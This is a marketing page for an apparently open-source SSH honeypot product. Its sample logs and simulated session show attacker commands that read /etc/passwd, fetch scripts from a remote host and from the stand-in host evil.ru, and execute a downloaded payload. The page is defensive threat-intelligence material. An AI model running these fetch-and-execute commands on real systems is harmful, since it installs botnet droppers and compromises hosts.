Instant visibility into every session

Turn every
attack into

CipherSentry deploys SSH decoys that lure attackers in, analyzes their techniques and turns every intrusion attempt into actionable intelligence.

Open source
GitHub · MIT License
Integration
Docker · 5 min setup
Compatibility
Linux · Docker · Cloud
Live sessions
real honeypot data
honeypot@ciphersentry:~
root@honeypot:~# tail -f /var/log/honeypot.log
{"ts":"09:11:02","ip":"185.220.[REDACTED].47","user":"admin","pass":"Admin123!","cmd":"uname -a"}
{"ts":"09:11:08","ip":"91.108.[REDACTED].220","user":"root","pass":"toor","cmd":"cat /etc/passwd"}
{"ts":"09:11:15","ip":"45.33.[REDACTED].156","user":"ubuntu","pass":"ubuntu","cmd":"wget http://185.x.x.x/bot.sh"}
{"ts":"09:11:21","ip":"192.241.[REDACTED].12","user":"pi","pass":"raspberry","cmd":"crontab -e"}
ALERT Payload detectado · ELF x86_64 · sha256:a3f8...
root@honeypot:~# _
Representative sample of real sessions
Payload detected
ELF · Botnet dropper
648.821
Access attempts captured
2.889
Unique attacking IPs
428.990
Attacker commands logged
44.732
Unique credentials captured

Real data captured by the CipherSentry honeypot in production.

Features

Everything you need to
know your attackers

From credential capture to payload analysis, CipherSentry collects every detail of every intrusion attempt.

01

Realistic SSH emulation

A fully simulated Debian 12 system with a virtual filesystem, real commands and plausible responses that fool sophisticated attackers.

02

Credential capture

Records username, password, SSH client version and authentication method. Feed your blocking rules with real data.

03

Real-time geolocation

Every attacking IP geolocated on an interactive map. Visualize attack origins, distributed botnets and regional patterns.

04

Payload capture

Every file an attacker downloads is stored and classified without ever being executed. Analyze ELF droppers, scripts and binaries in a safe environment.

05

Analytics dashboard

Web dashboard with server metrics, session timeline, per-IP analysis, attacker terminal reconstruction and report export.

06

JSON API (stats + IOCs)

Integrate honeypot data into your SIEM, XDR or threat intelligence platform. Token authentication, standard JSON responses.

Flagship product

Next-generation
SSH honeypot

It's not just a logger. CipherSentry simulates a full Debian server: a filesystem with real directories, commands with plausible output, interactive editors and compilers that "run" without executing real code.

  • Per-session isolation — each attacker gets its own VFS
  • Download and analyze payloads without ever running them
  • Logs reconnaissance tools, backdoors and miners
  • JSONL-format logs — direct ingestion into Elastic/Splunk
  • Production-ready Docker in under 5 minutes
See the full documentation →
session · 185.220.[REDACTED].47
Last login: Thu Jun 11 08:42:11 2026 from 185.220.[REDACTED].47
Debian GNU/Linux 12 (bookworm)
 
root@debian-prod:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian-prod:~# wget http://evil.ru/payload.sh
Connecting to evil.ru... connected.
HTTP request sent, awaiting response... 200 OK
Saving to: 'payload.sh' [4.2 KB]
root@debian-prod:~# chmod +x payload.sh && ./payload.sh
root@debian-prod:~# _
Payload capturado y analizado Ejecución bloqueada
Community

Be one of the first
to deploy it

CipherSentry is in early access. We're looking for security teams that want to capture real intelligence on attackers and give us direct feedback.

The first teams will get priority access, direct support from the team and founder pricing.

See available plans
PDF ~171 KB · ES/EN
Free report · Intelligence series
Anatomy of an SSH attack
From the first echo to the root password change — 4 chapters with real data from our honeypot
Download PDF →
Start today

Set the decoy.
Capture the intelligence.

Open source under the MIT license. Free plan up to 10,000 commands/month. No credit card to get started.